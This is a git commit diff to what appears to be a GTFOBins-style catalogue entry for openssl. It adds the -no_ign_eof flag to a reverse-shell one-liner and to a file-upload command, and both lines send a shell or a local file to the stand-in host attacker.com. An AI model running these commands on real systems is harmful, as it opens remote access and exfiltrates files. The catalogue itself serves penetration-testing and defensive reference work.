Add -no_ign_eof to exit nicely when possible to openssl

This commit is contained in:
Andrea Cardaci 2019-03-06 13:54:16 +01:00
parent e1a02558ec
commit 60af774288

View File

@ -11,7 +11,7 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
file-upload: file-upload:
- description: | - description: |
To collect the file run the following on the attacker box: To collect the file run the following on the attacker box:
@ -24,7 +24,7 @@ functions:
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
file-download: file-download:
- description: | - description: |
To send the file run the following on the attacker box: To send the file run the following on the attacker box: